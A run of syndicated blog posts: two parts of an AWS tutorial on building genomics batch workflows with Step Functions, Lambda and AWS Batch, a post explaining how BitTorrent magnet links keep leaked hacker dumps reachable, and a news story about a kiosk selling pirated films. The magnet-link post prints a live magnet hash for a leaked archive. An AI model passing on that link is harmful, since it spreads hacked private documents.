Angel Pizarro is a Scientific Computing Technical Business Development Manager at AWS

This post is the fourth in a series on how to build a genomics workflow on AWS. In Part 1, we introduced a general architecture, shown below, and highlighted the three common layers in a batch workflow:

  • Job
  • Batch
  • Workflow

In Part 2, you built a Docker container for each job that needed to run as part of your workflow, and stored them in Amazon ECR.

In Part 3, you tackled the batch layer and built a scalable, elastic, and easily maintainable batch engine using AWS Batch. This solution took care of dynamically scaling your compute resources in response to the number of runnable jobs in your job queue length as well as managed job placement.

In part 4, you build out the workflow layer of your solution using AWS Step Functions and AWS Lambda. You then run an end-to-end genomic analysis―specifically known as exome secondary analysis―for many times at a cost of less than $1 per exome.

Step Functions makes it easy to coordinate the components of your applications using visual workflows. Building applications from individual components that each perform a single function lets you scale and change your workflow quickly. You can use the graphical console to arrange and visualize the components of your application as a series of steps, which simplify building and running multi-step applications. You can change and add steps without writing code, so you can easily evolve your application and innovate faster.

An added benefit of using Step Functions to define your workflows is that the state machines you create are immutable. While you can delete a state machine, you cannot alter it after it is created. For regulated workloads where auditing is important, you can be assured that state machines you used in production cannot be altered.

In this blog post, you will create a Lambda state machine to orchestrate your batch workflow. For more information on how to create a basic state machine, please see this Step Functions tutorial.

All code related to this blog series can be found in the associated GitHub repository here.

Build a state machine building block

To skip the following steps, we have provided an AWS CloudFormation template that can deploy your Step Functions state machine. You can use this in combination with the setup you did in part 3 to quickly set up the environment in which to run your analysis.

The state machine is composed of smaller state machines that submit a job to AWS Batch, and then poll and check its execution.

The steps in this building block state machine are as follows:

  1. A job is submitted.
    Each analytical module/job has its own Lambda function for submission and calls the batchSubmitJob Lambda function that you built in the previous blog post. You will build these specialized Lambda functions in the following section.
  2. The state machine queries the AWS Batch API for the job status.
    This is also a Lambda function.
  3. The job status is checked to see if the job has completed.
    If the job status equals SUCCESS, proceed to log the final job status. If the job status equals FAILED, end the execution of the state machine. In all other cases, wait 30 seconds and go back to Step 2.

Here is the JSON representing this state machine.

{
  "Comment": "A simple example that submits a Job to AWS Batch",
  "StartAt": "SubmitJob",
  "States": {
    "SubmitJob": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>::function:batchSubmitJob",
      "Next": "GetJobStatus"
    },
    "GetJobStatus": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchGetJobStatus",
      "Next": "CheckJobStatus",
      "InputPath": "$",
      "ResultPath": "$.status"
    },
    "CheckJobStatus": {
      "Type": "Choice",
      "Choices": [
        {
          "Variable": "$.status",
          "StringEquals": "FAILED",
          "End": true
        },
        {
          "Variable": "$.status",
          "StringEquals": "SUCCEEDED",
          "Next": "GetFinalJobStatus"
        }
      ],
      "Default": "Wait30Seconds"
    },
    "Wait30Seconds": {
      "Type": "Wait",
      "Seconds": 30,
      "Next": "GetJobStatus"
    },
    "GetFinalJobStatus": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchGetJobStatus",
      "End": true
    }
  }
}

Building the Lambda functions for the state machine

You need two basic Lambda functions for this state machine. The first one submits a job to AWS Batch and the second checks the status of the AWS Batch job that was submitted.

In AWS Step Functions, you specify an input as JSON that is read into your state machine. Each state receives the aggregate of the steps immediately preceding it, and you can specify which components a state passes on to its children. Because you are using Lambda functions to execute tasks, one of the easiest routes to take is to modify the input JSON, represented as a Python dictionary, within the Lambda function and return the entire dictionary back for the next state to consume.

Building the batchSubmitIsaacJob Lambda function

For Step 1 above, you need a Lambda function for each of the steps in your analysis workflow. As you created a generic Lambda function in the previous post to submit a batch job (batchSubmitJob), you can use that function as the basis for the specialized functions you’ll include in this state machine. Here is such a Lambda function for the Isaac aligner.

from __future__ import print_function

import boto3
import json
import traceback

lambda_client = boto3.client('lambda')



def lambda_handler(event, context):
    try:
        # Generate output put
        bam_s3_path = '/'.join([event['resultsS3Path'], event['sampleId'], 'bam/'])

        depends_on = event['dependsOn'] if 'dependsOn' in event else []

        # Generate run command
        command = [
            '--bam_s3_folder_path', bam_s3_path,
            '--fastq1_s3_path', event['fastq1S3Path'],
            '--fastq2_s3_path', event['fastq2S3Path'],
            '--reference_s3_path', event['isaac']['referenceS3Path'],
            '--working_dir', event['workingDir']
        ]

        if 'cmdArgs' in event['isaac']:
            command.extend(['--cmd_args', event['isaac']['cmdArgs']])
        if 'memory' in event['isaac']:
            command.extend(['--memory', event['isaac']['memory']])

        # Submit Payload
        response = lambda_client.invoke(
            FunctionName='batchSubmitJob',
            InvocationType='RequestResponse',
            LogType='Tail',
            Payload=json.dumps(dict(
                dependsOn=depends_on,
                containerOverrides={
                    'command': command,
                },
                jobDefinition=event['isaac']['jobDefinition'],
                jobName='-'.join(['isaac', event['sampleId']]),
                jobQueue=event['isaac']['jobQueue']
            )))

        response_payload = response['Payload'].read()

        # Update event
        event['bamS3Path'] = bam_s3_path
        event['jobId'] = json.loads(response_payload)['jobId']
        
        return event
    except Exception as e:
        traceback.print_exc()
        raise e

In the Lambda console, create a Python 2.7 Lambda function named batchSubmitIsaacJob and paste in the above code. Use the LambdaBatchExecutionRole that you created in the previous post. For more information, see Step 2.1: Create a Hello World Lambda Function.

This Lambda function reads in the inputs passed to the state machine it is part of, formats the data for the batchSubmitJob Lambda function, invokes that Lambda function, and then modifies the event dictionary to pass onto the subsequent states. You can repeat these for each of the other tools, which can be found in the tools//lambda/lambda_function.py script in the GitHub repo.

Building the batchGetJobStatus Lambda function

For Step 2 above, the process queries the AWS Batch DescribeJobs API action with jobId to identify the state that the job is in. You can put this into a Lambda function to integrate it with Step Functions.

In the Lambda console, create a new Python 2.7 function with the LambdaBatchExecutionRole IAM role. Name your function batchGetJobStatus and paste in the following code. This is similar to the batch-get-job-python27 Lambda blueprint.

from __future__ import print_function

import boto3
import json

print('Loading function')

batch_client = boto3.client('batch')

def lambda_handler(event, context):
    # Log the received event
    print("Received event: " + json.dumps(event, indent=2))
    # Get jobId from the event
    job_id = event['jobId']

    try:
        response = batch_client.describe_jobs(
            jobs=[job_id]
        )
        job_status = response['jobs'][0]['status']
        return job_status
    except Exception as e:
        print(e)
        message = 'Error getting Batch Job status'
        print(message)
        raise Exception(message)

Structuring state machine input

You have structured the state machine input so that general file references are included at the top-level of the JSON object, and any job-specific items are contained within a nested JSON object. At a high level, this is what the input structure looks like:

{
        "general_field_1": "value1",
        "general_field_2": "value2",
        "general_field_3": "value3",
        "job1": {},
        "job2": {},
        "job3": {}
}

Building the full state machine

By chaining these state machine components together, you can quickly build flexible workflows that can process genomes in multiple ways. The development of the larger state machine that defines the entire workflow uses four of the above building blocks. You use the Lambda functions that you built in the previous section. Rename each building block submission to match the tool name.

We have provided a CloudFormation template to deploy your state machine and the associated IAM roles. In the CloudFormation console, select Create Stack, choose your template (deploy_state_machine.yaml), and enter in the ARNs for the Lambda functions you created.

Continue through the rest of the steps and deploy your stack. Be sure to check the box next to "I acknowledge that AWS CloudFormation might create IAM resources."

Once the CloudFormation stack is finished deploying, you should see the following image of your state machine.

In short, you first submit a job for Isaac, which is the aligner you are using for the analysis. Next, you use parallel state to split your output from "GetFinalIsaacJobStatus" and send it to both your variant calling step, Strelka, and your QC step, Samtools Stats. These then are run in parallel and you annotate the results from your Strelka step with snpEff.

Putting it all together

Now that you have built all of the components for a genomics secondary analysis workflow, test the entire process.

We have provided sequences from an Illumina sequencer that cover a region of the genome known as the exome. Most of the positions in the genome that we have currently associated with disease or human traits reside in this region, which is 1–2% of the entire genome. The workflow that you have built works for both analyzing an exome, as well as an entire genome.

Additionally, we have provided prebuilt reference genomes for Isaac, located at:

s3://aws-batch-genomics-resources/reference/

If you are interested, we have provided a script that sets up all of that data. To execute that script, run the following command on a large EC2 instance:

make reference REGISTRY=<your-ecr-registry>

Indexing and preparing this reference takes many hours on a large-memory EC2 instance. Be careful about the costs involved and note that the data is available through the prebuilt reference genomes.

Starting the execution

In a previous section, you established a provenance for the JSON that is fed into your state machine. For ease, we have auto-populated the input JSON for you to the state machine. You can also find this in the GitHub repo under workflow/test.input.json:

{
  "fastq1S3Path": "s3://aws-batch-genomics-resources/fastq/SRR1919605_1.fastq.gz",
  "fastq2S3Path": "s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz",
  "referenceS3Path": "s3://aws-batch-genomics-resources/reference/hg38.fa",
  "resultsS3Path": "s3://<bucket>/genomic-workflow/results",
  "sampleId": "NA12878_states_1",
  "workingDir": "/scratch",
  "isaac": {
    "jobDefinition": "isaac-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/highPriority-myenv",
    "referenceS3Path": "s3://aws-batch-genomics-resources/reference/isaac/"
  },
  "samtoolsStats": {
    "jobDefinition": "samtools_stats-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/lowPriority-myenv"
  },
  "strelka": {
    "jobDefinition": "strelka-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/highPriority-myenv",
    "cmdArgs": " --exome "
  },
  "snpEff": {
    "jobDefinition": "snpeff-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/lowPriority-myenv",
    "cmdArgs": " -t hg38 "
  }
}

You are now at the stage to run your full genomic analysis. Copy the above to a new text file, change paths and ARNs to the ones that you created previously, and save your JSON input as input.states.json.

In the CLI, execute the following command. You need the ARN of the state machine that you created in the previous post:

aws stepfunctions start-execution --state-machine-arn <your-state-machine-arn> --input file://input.states.json

Your analysis has now started. By using Spot Instances with AWS Batch, you can quickly scale out your workflows while concurrently optimizing for cost. While this is not guaranteed, most executions of the workflows presented here should cost under $1 for a full analysis.

Monitoring the execution

The output from the above CLI command gives you the ARN that describes the specific execution. Copy that and navigate to the Step Functions console. Select the state machine that you created previously and paste the ARN into the search bar.

The screen shows information about your specific execution. On the left, you see where your execution currently is in the workflow.

In the following screenshot, you can see that your workflow has successfully completed the alignment job and moved onto the subsequent steps, which are variant calling and generating quality information about your sample.

You can also navigate to the AWS Batch console and see that progress of all of your jobs reflected there as well.

Finally, after your workflow has completed successfully, check out the S3 path to which you wrote all of your files. If you run a ls –recursive command on the S3 results path, specified in the input to your state machine execution, you should see something similar to the following:

2017-05-02 13:46:32 6475144340 genomic-workflow/results/NA12878_run1/bam/sorted.bam
2017-05-02 13:46:34    7552576 genomic-workflow/results/NA12878_run1/bam/sorted.bam.bai
2017-05-02 13:46:32         45 genomic-workflow/results/NA12878_run1/bam/sorted.bam.md5
2017-05-02 13:53:20      68769 genomic-workflow/results/NA12878_run1/stats/bam_stats.dat
2017-05-02 14:05:12        100 genomic-workflow/results/NA12878_run1/vcf/stats/runStats.tsv
2017-05-02 14:05:12        359 genomic-workflow/results/NA12878_run1/vcf/stats/runStats.xml
2017-05-02 14:05:12  507577928 genomic-workflow/results/NA12878_run1/vcf/variants/genome.S1.vcf.gz
2017-05-02 14:05:12     723144 genomic-workflow/results/NA12878_run1/vcf/variants/genome.S1.vcf.gz.tbi
2017-05-02 14:05:12  507577928 genomic-workflow/results/NA12878_run1/vcf/variants/genome.vcf.gz
2017-05-02 14:05:12     723144 genomic-workflow/results/NA12878_run1/vcf/variants/genome.vcf.gz.tbi
2017-05-02 14:05:12   30783484 genomic-workflow/results/NA12878_run1/vcf/variants/variants.vcf.gz
2017-05-02 14:05:12    1566596 genomic-workflow/results/NA12878_run1/vcf/variants/variants.vcf.gz.tbi

Modifications to the workflow

You have now built and run your genomics workflow. While diving deep into modifications to this architecture are beyond the scope of these posts, we wanted to leave you with several suggestions of how you might modify this workflow to satisfy additional business requirements.

  • Job tracking with Amazon DynamoDB
    In many cases, such as if you are offering Genomics-as-a-Service, you might want to track the state of your jobs with DynamoDB to get fine-grained records of how your jobs are running. This way, you can easily identify the cost of individual jobs and workflows that you run.
  • Resuming from failure
    Both AWS Batch and Step Functions natively support job retries and can cover many of the standard cases where a job might be interrupted. There may be cases, however, where your workflow might fail in a way that is unpredictable. In this case, you can use custom error handling with AWS Step Functions to build out a workflow that is even more resilient. Also, you can build in fail states into your state machine to fail at any point, such as if a batch job fails after a certain number of retries.
  • Invoking Step Functions from Amazon API Gateway
    You can use API Gateway to build an API that acts as a "front door" to Step Functions. You can create a POST method that contains the input JSON to feed into the state machine you built. For more information, see the Implementing Serverless Manual Approval Steps in AWS Step Functions and Amazon API Gateway blog post.

Conclusion

While the approach we have demonstrated in this series has been focused on genomics, it is important to note that this can be generalized to nearly any high-throughput batch workload. We hope that you have found the information useful and that it can serve as a jump-start to building your own batch workloads on AWS with native AWS services.

For more information about how AWS can enable your genomics workloads, be sure to check out the AWS Genomics page.

Other posts in this four-part series:

Please leave any questions and comments below.

Building High-Throughput Genomic Batch Workflows on AWS: Batch Layer (Part 3 of 4)

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/building-high-throughput-genomic-batch-workflows-on-aws-batch-layer-part-3-of-4/

Aaron Friedman is a Healthcare and Life Sciences Partner Solutions Architect at AWS

Angel Pizarro is a Scientific Computing Technical Business Development Manager at AWS

This post is the third in a series on how to build a genomics workflow on AWS. In Part 1, we introduced a general architecture, shown below, and highlighted the three common layers in a batch workflow:

  • Job
  • Batch
  • Workflow

In Part 2, you built a Docker container for each job that needed to run as part of your workflow, and stored them in Amazon ECR.

In Part 3, you tackle the batch layer and build a scalable, elastic, and easily maintainable batch engine using AWS Batch.

AWS Batch enables developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS. It dynamically provisions the optimal quantity and type of compute resources (for example, CPU or memory optimized instances) based on the volume and specific resource requirements of the batch jobs that you submit. With AWS Batch, you do not need to install and manage your own batch computing software or server clusters, which allows you to focus on analyzing results, such as those of your genomic analysis.

Integrating applications into AWS Batch

If you are new to AWS Batch, we recommend reading Setting Up AWS Batch to ensure that you have the proper permissions and AWS environment.

After you have a working environment, you define several types of resources:

  • IAM roles that provide service permissions
  • A compute environment that launches and terminates compute resources for jobs
  • A custom Amazon Machine Image (AMI)
  • A job queue to submit the units of work and to schedule the appropriate resources within the compute environment to execute those jobs
  • Job definitions that define how to execute an application

After the resources are created, you’ll test the environment and create an AWS Lambda function to send generic jobs to the queue.

This genomics workflow covers the basic steps. For more information, see Getting Started with AWS Batch.

Creating the necessary IAM roles

AWS Batch simplifies batch processing by managing a number of underlying AWS services so that you can focus on your applications. As a result, you create IAM roles that give the service permissions to act on your behalf. In this section, deploy the AWS CloudFormation template included in the GitHub repository and extract the ARNs for later use.

To deploy the stack, go to the top level in the repo with the following command:

aws cloudformation create-stack --template-body file://batch/setup/iam.template.yaml --stack-name iam --capabilities CAPABILITY_NAMED_IAM

You can capture the output from this stack in the Outputs tab in the CloudFormation console:

Creating the compute environment

In AWS Batch, you will set up a managed compute environments. Managed compute environments automatically launch and terminate compute resources on your behalf based on the aggregate resources needed by your jobs, such as vCPU and memory, and simple boundaries that you define.

When defining your compute environment, specify the following:

  • Desired instance types in your environment
  • Min and max vCPUs in the environment
  • The Amazon Machine Image (AMI) to use
  • Percentage value for bids on the Spot Market and VPC subnets that can be used.

AWS Batch then provisions an elastic and heterogeneous pool of Amazon EC2 instances based on the aggregate resource requirements of jobs sitting in the RUNNABLE state. If a mix of CPU and memory-intensive jobs are ready to run, AWS Batch provisions the appropriate ratio and size of CPU and memory-optimized instances within your environment. For this post, you will use the simplest configuration, in which instance types are set to "optimal" allowing AWS Batch to choose from the latest C, M, and R EC2 instance families.

While you could create this compute environment in the console, we provide the following CLI commands. Replace the subnet IDs and key name with your own private subnets and key, and the image-id with the image you will build in the next section.

ACCOUNTID=<your account id>
SERVICEROLE=<from output in CloudFormation template>
IAMFLEETROLE=<from output in CloudFormation template>
JOBROLEARN=<from output in CloudFormation template>
SUBNETS=<comma delimited list of subnets>
SECGROUPS=<your security groups>
SPOTPER=50 # percentage of on demand
IMAGEID=<ami-id corresponding to the one you created>
INSTANCEROLE=<from output in CloudFormation template>
REGISTRY=${ACCOUNTID}.dkr.ecr.us-east-1.amazonaws.com
KEYNAME=<your key name>
MAXCPU=1024 # max vCPUs in compute environment
ENV=myenv

# Creates the compute environment
aws batch create-compute-environment --compute-environment-name genomicsEnv-$ENV --type MANAGED --state ENABLED --service-role ${SERVICEROLE} --compute-resources type=SPOT,minvCpus=0,maxvCpus=$MAXCPU,desiredvCpus=0,instanceTypes=optimal,imageId=$IMAGEID,subnets=$SUBNETS,securityGroupIds=$SECGROUPS,ec2KeyPair=$KEYNAME,instanceRole=$INSTANCEROLE,bidPercentage=$SPOTPER,spotIamFleetRole=$IAMFLEETROLE

Creating the custom AMI for AWS Batch

While you can use default Amazon ECS-optimized AMIs with AWS Batch, you can also provide your own image in managed compute environments. We will use this feature to provision additional scratch EBS storage on each of the instances that AWS Batch launches and also to encrypt both the Docker and scratch EBS volumes.

AWS Batch has the same requirements for your AMI as Amazon ECS. To build the custom image, modify the default Amazon ECS-Optimized Amazon Linux AMI in the following ways:

  • Attach a 1 TB scratch volume to /dev/sdb
  • Encrypt the Docker and new scratch volumes
  • Mount the scratch volume to /docker_scratch by modifying /etcfstab

The first two tasks can be addressed when you create the custom AMI in the console. Spin up a small t2.micro instance, and proceed through the standard EC2 instance launch.

After your instance has launched, record the IP address and then SSH into the instance. Copy and paste the following code:

sudo yum -y update
sudo parted /dev/xvdb mklabel gpt
sudo parted /dev/xvdb mkpart primary 0% 100%
sudo mkfs -t ext4 /dev/xvdb1
sudo mkdir /docker_scratch
sudo echo -e '/dev/xvdb1\t/docker_scratch\text4\tdefaults\t0\t0' | sudo tee -a /etc/fstab
sudo mount -a

This auto-mounts your scratch volume to /docker_scratch, which is your scratch directory for batch processing. Next, create your new AMI and record the image ID.

Creating the job queues

AWS Batch job queues are used to coordinate the submission of batch jobs. Your jobs are submitted to job queues, which can be mapped to one or more compute environments. Job queues have priority relative to each other. You can also specify the order in which they consume resources from your compute environments.

In this solution, use two job queues. The first is for high priority jobs, such as alignment or variant calling. Set this with a high priority (1000) and map back to the previously created compute environment. Next, set a second job queue for low priority jobs, such as quality statistics generation. To create these compute environments, enter the following CLI commands:

aws batch create-job-queue --job-queue-name highPriority-${ENV} --compute-environment-order order=0,computeEnvironment=genomicsEnv-${ENV}  --priority 1000 --state ENABLED
aws batch create-job-queue --job-queue-name lowPriority-${ENV} --compute-environment-order order=0,computeEnvironment=genomicsEnv-${ENV}  --priority 1 --state ENABLED

Creating the job definitions

To run the Isaac aligner container image locally, supply the Amazon S3 locations for the FASTQ input sequences, the reference genome to align to, and the output BAM file. For more information, see tools/isaac/README.md.

The Docker container itself also requires some information on a suitable mountable volume so that it can read and write files temporary files without running out of space.

Note: In the following example, the FASTQ files as well as the reference files to run are in a publicly available bucket.

FASTQ1=s3://aws-batch-genomics-resources/fastq/SRR1919605_1.fastq.gz
FASTQ2=s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz
REF=s3://aws-batch-genomics-resources/reference/isaac/
BAM=s3://mybucket/genomic-workflow/test_results/bam/

mkdir ~/scratch

docker run --rm -ti -v $(HOME)/scratch:/scratch $REPO_URI --bam_s3_folder_path $BAM \
--fastq1_s3_path $FASTQ1 \
--fastq2_s3_path $FASTQ2 \
--reference_s3_path $REF \
--working_dir /scratch 

Locally running containers can typically expand their CPU and memory resource headroom. In AWS Batch, the CPU and memory requirements are hard limits and are allocated to the container image at runtime.

Isaac is a fairly resource-intensive algorithm, as it creates an uncompressed index of the reference genome in memory to match the query DNA sequences. The large memory space is shared across multiple CPU threads, and Isaac can scale almost linearly with the number of CPU threads given to it as a parameter.

To fit these characteristics, choose an optimal instance size to maximize the number of CPU threads based on a given large memory footprint, and deploy a Docker container that uses all of the instance resources. In this case, we chose a host instance with 80+ GB of memory and 32+ vCPUs. The following code is example JSON that you can pass to the AWS CLI to create a job definition for Isaac.

aws batch register-job-definition --job-definition-name isaac-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/isaac",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":80000,
"vcpus":32,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

You can copy and paste the following code for the other three job definitions:

aws batch register-job-definition --job-definition-name strelka-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/strelka",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":32000,
"vcpus":32,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

aws batch register-job-definition --job-definition-name snpeff-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/snpeff",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":10000,
"vcpus":4,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

aws batch register-job-definition --job-definition-name samtoolsStats-${ENV} --type container --retry-strategy attempts=3 --container-properties '
{"image": "'${REGISTRY}'/samtools_stats",
"jobRoleArn":"'${JOBROLEARN}'",
"memory":10000,
"vcpus":4,
"mountPoints": [{"containerPath": "/scratch", "readOnly": false, "sourceVolume": "docker_scratch"}],
"volumes": [{"name": "docker_scratch", "host": {"sourcePath": "/docker_scratch"}}]
}'

The value for "image" comes from the previous post on creating a Docker image and publishing to ECR. The value for jobRoleArn you can find from the output of the CloudFormation template that you deployed earlier. In addition to providing the number of CPU cores and memory required by Isaac, you also give it a storage volume for scratch and staging. The volume comes from the previously defined custom AMI.

Testing the environment

After you have created the Isaac job definition, you can submit the job using the AWS Batch submitJob API action. While the base mappings for Docker run are taken care of in the job definition that you just built, the specific job parameters should be specified in the container overrides section of the API call. Here’s what this would look like in the CLI, using the same parameters as in the bash commands shown earlier:

aws batch submit-job --job-name testisaac --job-queue highPriority-${ENV} --job-definition isaac-${ENV}:1 --container-overrides '{
"command": [
			"--bam_s3_folder_path", "s3://mybucket/genomic-workflow/test_batch/bam/",
            "--fastq1_s3_path", "s3://aws-batch-genomics-resources/fastq/ SRR1919605_1.fastq.gz",
            "--fastq2_s3_path", "s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz",
            "--reference_s3_path", "s3://aws-batch-genomics-resources/reference/isaac/",
            "--working_dir", "/scratch",
			"—cmd_args", " --exome ",]
}'

When you execute a submitJob call, jobId is returned. You can then track the progress of your job using the describeJobs API action:

aws batch describe-jobs –jobs <jobId returned from submitJob>

You can also track the progress of all of your jobs in the AWS Batch console dashboard.

To see exactly where a RUNNING job is at, use the link in the AWS Batch console to direct you to the appropriate location in CloudWatch logs.

Completing the batch environment setup

To finish, create a Lambda function to submit a generic AWS Batch job.

In the Lambda console, create a Python 2.7 Lambda function named batchSubmitJob. Copy and paste the following code. This is similar to the batch-submit-job-python27 Lambda blueprint. Use the LambdaBatchExecutionRole that you created earlier. For more information about creating functions, see Step 2.1: Create a Hello World Lambda Function.

from __future__ import print_function

import json
import boto3

batch_client = boto3.client('batch')

def lambda_handler(event, context):
    # Log the received event
    print("Received event: " + json.dumps(event, indent=2))
    # Get parameters for the SubmitJob call
    # http://docs.aws.amazon.com/batch/latest/APIReference/API_SubmitJob.html
    job_name = event['jobName']
    job_queue = event['jobQueue']
    job_definition = event['jobDefinition']
    
    # containerOverrides, dependsOn, and parameters are optional
    container_overrides = event['containerOverrides'] if event.get('containerOverrides') else {}
    parameters = event['parameters'] if event.get('parameters') else {}
    depends_on = event['dependsOn'] if event.get('dependsOn') else []
    
    try:
        response = batch_client.submit_job(
            dependsOn=depends_on,
            containerOverrides=container_overrides,
            jobDefinition=job_definition,
            jobName=job_name,
            jobQueue=job_queue,
            parameters=parameters
        )
        
        # Log response from AWS Batch
        print("Response: " + json.dumps(response, indent=2))
        
        # Return the jobId
        event['jobId'] = response['jobId']
        return event
    
    except Exception as e:
        print(e)
        message = 'Error getting Batch Job status'
        print(message)
        raise Exception(message)

Conclusion

In part 3 of this series, you successfully set up your data processing, or batch, environment in AWS Batch. We also provided a Python script in the corresponding GitHub repo that takes care of all of the above CLI arguments for you, as well as building out the job definitions for all of the jobs in the workflow: Isaac, Strelka, SAMtools, and snpEff. You can check the script’s README for additional documentation.

In Part 4, you’ll cover the workflow layer using AWS Step Functions and AWS Lambda.

Please leave any questions and comments below.

Hacker dumps, magnet links, and you

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/05/hacker-dumps-magnet-links-and-you.html

In an excellent post pointing out Wikileaks deserves none of the credit given them in the #MacronLeaks, the author erroneously stated that after Archive.org took down the files, that Wikileaks provided links to a second archive. This is not true. Instead, Wikileaks simply pointed to what’s known as “magnet links” of the first archive. Understanding magnet links is critical to understanding all these links and dumps, so I thought I’d describe them.

The tl;dr version is this: anything published via BitTorrent has a matching “magnet link” address, and the contents can still be reached via magnet links when the original publisher goes away.

In this case, the leaker uploaded to “archive.org”, a popular Internet archiving resource. This website allows you to either download files directly, which is slow, or via peer-to-peer using BitTorrent, which is fast. As you know, BitTorrent works by all the downloaders exchanging pieces with each other, rather getting them from the server. I give you a piece you don’t have, in exchange for a piece I don’t have.

BitTorrent, though still requires a “torrent” (a ~30k file that lists all the pieces) and a “tracker” (http://bt1.archive.org:6969/announce) that keeps a list of all the peers so they can find each other. The tracker also makes sure that every piece is available from at least one peer.

When “archive.org” realized what was happening, they deleted the leaked files, the torrent, and the tracking.

However, BitTorrent has another feature called “magnet links”. This is simply the “hash” of the “torrent” file contents, which looks something like “06724742e86176c0ec82e294d299fba4aa28901a“. (This isn’t a hash of the entire file, but just the important parts, such as the filenames and sizes).

Along with downloading files, BitTorrent software on your computer also participates in a “distributed hash” network. When using a torrent file to download, your BitTorrent software still tell other random BitTorrent clients about the hash. Knowledge of this hash thus spreads throughout the BitTorrent world. It’s only 16 bytes in size, so the average BitTorrent client can keep track of millions of such hashes while consuming very little memory or bandwidth.

If somebody decides they want to download the BitTorrent with that hash, they broadcast that request throughout this “distributed hash” network until they find one or more people with the full torrent. They then get the torrent description file from them, and also a list of peers in the “swarm” who are downloading the file.

Thus, when the original torrent description file, the tracker, and original copy goes away, you can still locate the swarm of downloaders through this hash. As long as all the individual pieces exist in the swarm, you can still successfully download the original file.

In this case, one of the leaked documents was a 2.3 gigabyte file called “langannerch.rar”. The torrent description file called “langanerch_archive.torrent” is 26 kilobytes in size. The hash (magnet link) is 16 bytes in size, written “magnet:?xt=urn:btih:06724742e86176c0ec82e294d299fba4aa28901a“. If you’ve got BitTorrent software installed and click on the link, you’ll join the swarm and start downloading the file, even though the original torrent/tracker/files have gone away.

According to my BitTorrent client, there are currently 108 people in the swarm downloading this file world-wide. I’m currently connected to 11 of them. Most of them appear to be located in France.

Looking at the General tab, I see that “availability” is 2.95. That means there exist 2.95 complete copies of the download. In other words, if there are 20 pieces, it means that for one of the pieces in the swarm, only 2 people have it. This is dangerously small — if those two people leave the network, then a complete copy of the dump will no longer exist in the swarm, and it’ll be impossible to download it all.

Such dumps can remain popular enough for years after the original tracker/torrent has disappeared, but at some point, a critical piece disappears, and it becomes impossible for anybody to download more than 99.95%, with everyone in the swarm waiting for that last piece. If you read this blogpost 6 months from now, you are likely to see 10 people in the swarm, all stuck at 99.95% complete.

Conclusion


The upshot of this is that it’s hard censoring BitTorrent, because all torrents also exist as magnet links. It took only a couple hours for Archive.org to take down the tracker/torrents/files, but after complete downloads were out in the swarm, all anybody needed was the hash of the original torrent to create a magnet link to the data. Those magnet links had already been published by many people. The Wikileaks tweet that linked to them was fairly late, all things considered, other people had already published them.

ATM-Style Kiosk Pumps Out Pirate Movies to USB Sticks

Post Syndicated from Andy original https://torrentfreak.com/atm-style-kiosk-pumps-out-pirate-movies-to-usb-sticks-170430/

For more than 30 years, consumers have obtained music and movies written to polycarbonate discs. CD, DVD and now Blu-ray discs are recognizable across the world as a cheap and pretty reliable carrier for large volumes of digital data.

While it may take a while before Blu-ray takes its final breaths, CDs and DVDs are already on borrowed time. For the younger generation already accustomed to storing huge amounts of data on tiny MicroSD cards and USB sticks, a plastic disc carrying content is almost as outdated as a vinyl record.

With this in mind, millions of consumers would welcome the idea of getting their movies in convenient formats such as AVI or MP4. This would enable them to freely move content from device to device, without having to spend more money. Of course, entertainment companies don’t like that idea at all, especially when it comes to movies.

That’s where SwiftMedia comes in, and it’s a sight to behold.

Spotted by a TorrentFreak reader in a shopping mall in Ethiopia, this bright yellow kiosk looks like an ATM. However, on closer inspection it reveals itself to be a self-service media machine that does everything that RedBox can do (and more) without a plastic disc in sight.

A SwiftMedia terminal in situ (credit)

“At the beginning of this year, All Mart (the Walmart equivalent here) brought in a new machine. It’s basically a monitor with a USB port but shaped like an ATM. It’s called SwiftMedia and there’s a guy who ‘maintains’ it,” our source explains.

“Basically you go to this very big store and you approach the machine and you plug in a USB drive. The screen will turn on and it will let you browse through a massive archive of movies.”

Screen close-up

As mentioned earlier, this is a completely disc-less system, meaning that transfers of all content purchased from the machine end up on a customer-provided USB stick. Needless to say, DRM and copyright protection aren’t high on the agenda for this unusual and innovative machine.

All the movies – on USB

Prices are cheap too, with packages available for 25, 50 and 100 birr ($1, $2 and $3). Feature movies reportedly cost between 3 and 5 birr (13 to 22 cents) depending on the movie release date, with older movies costing more. Documentaries weigh in at the top of the range with single songs and TV shows costing 13 cents.

“At first I assumed these movies had their rights lifted or something because well, you know, but then I later found out that the movies I had first seen were just there on release day,” our source continues.

“Apparently the maintenance guy torrents all day and stores the data on his drive, the drive shown by the SwiftMedia monitor. This would not have been a big deal as this is Ethiopia and the allegedly democratic government has bigger issues.”

